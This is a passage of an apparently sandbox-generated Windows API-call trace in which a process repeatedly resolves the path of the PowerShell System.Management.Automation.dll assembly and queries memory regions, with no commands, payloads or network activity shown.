AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.452] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xae327211, Data2=0x8251, Data3=0x4685, Data4=([0]=0xad, [1]=0x61, [2]=0x2e, [3]=0xf0, [4]=0xcc, [5]=0x2c, [6]=0x96, [7]=0xf4))) returned 0x0 [0054.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce058, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.452] GetLastError () returned 0x0 [0054.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce008, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.452] GetLastError () returned 0x0 [0054.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce008, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.452] GetLastError () returned 0x0 [0054.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce058, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.452] GetLastError () returned 0x0 [0054.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce008, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.452] GetLastError () returned 0x0 [0054.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce008, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.453] GetLastError () returned 0x0 [0054.453] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xd5e4d0a6, Data2=0xa3fc, Data3=0x497d, Data4=([0]=0xa8, [1]=0x54, [2]=0x25, [3]=0x4f, [4]=0xc, [5]=0xa4, [6]=0x1a, [7]=0xa4))) returned 0x0 [0054.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce058, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.453] GetLastError () returned 0x0 [0054.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce008, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.453] GetLastError () returned 0x0 [0054.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce008, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.453] GetLastError () returned 0x0 [0054.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce058, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.453] GetLastError () returned 0x0 [0054.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce008, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.453] GetLastError () returned 0x0 [0054.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce008, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.453] GetLastError () returned 0x0 [0054.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.453] GetLastError () returned 0x0 [0054.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.453] GetLastError () returned 0x0 [0054.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.454] GetLastError () returned 0x0 [0054.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.454] GetLastError () returned 0x0 [0054.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cddd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.454] GetLastError () returned 0x0 [0054.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cddd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.454] GetLastError () returned 0x0 [0054.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.454] GetLastError () returned 0x0 [0054.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.454] GetLastError () returned 0x0 [0054.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.454] GetLastError () returned 0x0 [0054.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.454] GetLastError () returned 0x0 [0054.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.454] GetLastError () returned 0x0 [0054.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.455] GetLastError () returned 0x0 [0054.455] VirtualQuery (in: lpAddress=0x2cd1f4, lpBuffer=0x2ce1f4, dwLength=0x1c | out: lpBuffer=0x2ce1f4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.455] GetLastError () returned 0x0 [0054.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.455] GetLastError () returned 0x0 [0054.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.455] GetLastError () returned 0x0 [0054.455] VirtualQuery (in: lpAddress=0x2cd1f4, lpBuffer=0x2ce1f4, dwLength=0x1c | out: lpBuffer=0x2ce1f4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.455] VirtualQuery (in: lpAddress=0x2cd230, lpBuffer=0x2ce230, dwLength=0x1c | out: lpBuffer=0x2ce230*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdbe8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.456] GetLastError () returned 0x0 [0054.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdb98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.456] GetLastError () returned 0x0 [0054.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdb98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.456] GetLastError () returned 0x0 [0054.456] VirtualQuery (in: lpAddress=0x2cd1f4, lpBuffer=0x2ce1f4, dwLength=0x1c | out: lpBuffer=0x2ce1f4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.456] VirtualQuery (in: lpAddress=0x2cd230, lpBuffer=0x2ce230, dwLength=0x1c | out: lpBuffer=0x2ce230*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdbe8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.456] GetLastError () returned 0x0 [0054.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdb98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.456] GetLastError () returned 0x0 [0054.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdb98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.456] GetLastError () returned 0x0 [0054.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.456] GetLastError () returned 0x0 [0054.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.456] GetLastError () returned 0x0 [0054.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.456] GetLastError () returned 0x0 [0054.457] VirtualQuery (in: lpAddress=0x2cd1f4, lpBuffer=0x2ce1f4, dwLength=0x1c | out: lpBuffer=0x2ce1f4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.457] VirtualQuery (in: lpAddress=0x2cd230, lpBuffer=0x2ce230, dwLength=0x1c | out: lpBuffer=0x2ce230*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdbe8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.457] GetLastError () returned 0x0 [0054.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdb98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.457] GetLastError () returned 0x0 [0054.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdb98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.457] GetLastError () returned 0x0 [0054.457] VirtualQuery (in: lpAddress=0x2cd1f4, lpBuffer=0x2ce1f4, dwLength=0x1c | out: lpBuffer=0x2ce1f4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.458] VirtualQuery (in: lpAddress=0x2cd230, lpBuffer=0x2ce230, dwLength=0x1c | out: lpBuffer=0x2ce230*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.458] GetLastError () returned 0x0 [0054.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.458] GetLastError () returned 0x0 [0054.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.458] GetLastError () returned 0x0 [0054.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.458] GetLastError () returned 0x0 [0054.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.458] GetLastError () returned 0x0 [0054.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.458] GetLastError () returned 0x0 [0054.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.458] GetLastError () returned 0x0 [0054.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.458] GetLastError () returned 0x0 [0054.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.458] GetLastError () returned 0x0 [0054.459] VirtualQuery (in: lpAddress=0x2cd1f4, lpBuffer=0x2ce1f4, dwLength=0x1c | out: lpBuffer=0x2ce1f4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.459] VirtualQuery (in: lpAddress=0x2cd230, lpBuffer=0x2ce230, dwLength=0x1c | out: lpBuffer=0x2ce230*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdbe8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.459] GetLastError () returned 0x0 [0054.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdb98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.459] GetLastError () returned 0x0 [0054.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdb98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.459] GetLastError () returned 0x0 [0054.459] VirtualQuery (in: lpAddress=0x2cd1f4, lpBuffer=0x2ce1f4, dwLength=0x1c | out: lpBuffer=0x2ce1f4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.459] VirtualQuery (in: lpAddress=0x2cd230, lpBuffer=0x2ce230, dwLength=0x1c | out: lpBuffer=0x2ce230*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdbe8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.459] GetLastError () returned 0x0 [0054.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdb98, lpFilePart=0x0 | out: 